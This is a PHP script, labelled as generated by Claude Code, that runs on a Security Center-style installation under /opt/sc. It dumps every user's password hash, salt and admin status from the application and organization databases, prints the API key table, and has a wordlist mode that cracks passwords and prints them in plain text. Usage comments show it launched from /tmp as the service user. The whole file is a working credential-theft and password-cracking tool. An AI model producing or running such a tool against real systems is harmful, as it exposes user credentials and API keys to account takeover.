<?php

// generated by Claude Code
// su - tns -s /bin/bash -c '/opt/sc/support/bin/php /tmp/dump_hashes.php 2>&1'
// echo -e "test\npassword\nadmin\nwrongpass" > /tmp/test_wordlist.txt
// su - tns -s /bin/bash -c '/opt/sc/support/bin/php /tmp/dump_hashes.php -crack /tmp/test_wordlist.txt 2>&1'

$GLOBALS["root"] = "/opt/sc";
require_once "/opt/sc/src/defines.php";
require_once "/opt/sc/src/lib/AuthenticationLib.php";
dbLib::setup(1, false);

$jsonMode  = in_array("-json", $argv);
$crackMode = in_array("-crack", $argv);
$wordlist  = null;

// Find wordlist argument (value after -crack)
foreach ($argv as $i => $arg) {
    if ($arg === "-crack" && isset($argv[$i+1])) {
        $wordlist = $argv[$i+1];
    }
}

if ($crackMode && (!$wordlist || !file_exists($wordlist))) {
    fwrite(STDERR, "Usage: php dump_hashes.php -crack /path/to/wordlist.txt [-json]\n");
    exit(1);
}

// Load users
$appdb = new PDO("sqlite:/opt/sc/application.db");
$adminUsers = $appdb->query("SELECT username FROM AdminUser")->fetchAll(PDO::FETCH_COLUMN);
$adminSet = array_map("strtolower", $adminUsers);
$users = $appdb->query("SELECT * FROM UserAuth")->fetchAll(PDO::FETCH_ASSOC);
foreach ($users as &$u) {
    $u["isAdmin"] = in_array(strtolower($u["username"]), $adminSet) ? "true" : "false";
}
unset($u);

// Also load org DB users
foreach (glob("/opt/sc/orgs/*/organization.db") as $orgdb) {
    $db2 = new PDO("sqlite:$orgdb");
    $tables = $db2->query("SELECT name FROM sqlite_master WHERE type='table' AND name='UserAuth'")->fetchAll(PDO::FETCH_COLUMN);
    foreach ($tables as $t) {
        $rows = $db2->query("SELECT * FROM $t")->fetchAll(PDO::FETCH_ASSOC);
        foreach ($rows as &$row) {
            $row["isAdmin"] = in_array(strtolower($row["username"]), $adminSet) ? "true" : "false";
            $row["_source"] = $orgdb;
        }
        unset($row);
        $users = array_merge($users, $rows);
    }
}

// Load API keys
$apikeys = $appdb->query("SELECT * FROM APIKey")->fetchAll(PDO::FETCH_ASSOC);

if ($crackMode) {
    // Crack mode
    $cracked = [];
    $fh = fopen($wordlist, "r");
    $i = 0;
    $start = microtime(true);
    $results = [];

    while (!feof($fh)) {
        $word = trim(fgets($fh));
        if ($word === "") continue;
        $i++;

        if ($i % 500 === 0) {
            $elapsed = microtime(true) - $start;
            $rate = round($i / $elapsed);
            fwrite(STDERR, "[$i tried | {$rate}/sec | " . count($cracked) . "/" . count($users) . " cracked]\n");
        }

        foreach ($users as $user) {
            $uname = $user["username"];
            $uid   = $user["id"] ?? $user["userID"] ?? "?";
            $key   = $uid . ":" . $uname;
            if (isset($cracked[$key])) continue;
            try {
                if (AuthenticationLib::goodPassword($user["authType"], $user["orgID"], $uname, $word, $user["password"], $user["salt"])) {
                    $cracked[$key] = $word;
                    if ($jsonMode) {
                        $results[] = ["id" => $uid, "username" => $uname, "password" => $word, "isAdmin" => $user["isAdmin"]];
                    } else {
                        echo "CRACKED: id=$uid username=$uname password=$word\n";
                    }
                    flush();
                }
            } catch (Throwable $e) { continue; }
        }

        if (count($cracked) === count($users)) break;
    }

    $elapsed = round(microtime(true) - $start, 2);
    $rate = round($i / max($elapsed, 0.01));
    fwrite(STDERR, "Done. $i words in {$elapsed}s ({$rate}/sec). " . count($cracked) . "/" . count($users) . " cracked.\n");

    if ($jsonMode) echo json_encode($results, JSON_PRETTY_PRINT) . "\n";

} else {
    // Default list mode
    $results = [];

    if ($jsonMode) {
        foreach ($users as $u) {
            $u["_table"] = "UserAuth";
            $u["_source"] = $u["_source"] ?? "application.db";
            $results[] = $u;
        }
        foreach ($apikeys as $k) {
            $k["_table"] = "APIKey";
            $k["_source"] = "application.db";
            $results[] = $k;
        }
        echo json_encode($results, JSON_PRETTY_PRINT) . "\n";
    } else {
        echo "\n" . str_repeat("=", 60) . "\n";
        echo "TABLE: application.db.UserAuth (" . count($users) . " rows)\n";
        echo str_repeat("=", 60) . "\n";
        foreach ($users as $i => $row) {
            echo "  --- Row " . ($i+1) . " ---\n";
            foreach ($row as $col => $val) echo "  $col: $val\n";
        }

        echo "\n" . str_repeat("=", 60) . "\n";
        echo "TABLE: application.db.APIKey (" . count($apikeys) . " rows)\n";
        echo str_repeat("=", 60) . "\n";
        foreach ($apikeys as $i => $row) {
            echo "  --- Row " . ($i+1) . " ---\n";
            foreach ($row as $col => $val) echo "  $col: $val\n";
        }

        echo "\nDONE\n";
    }
}
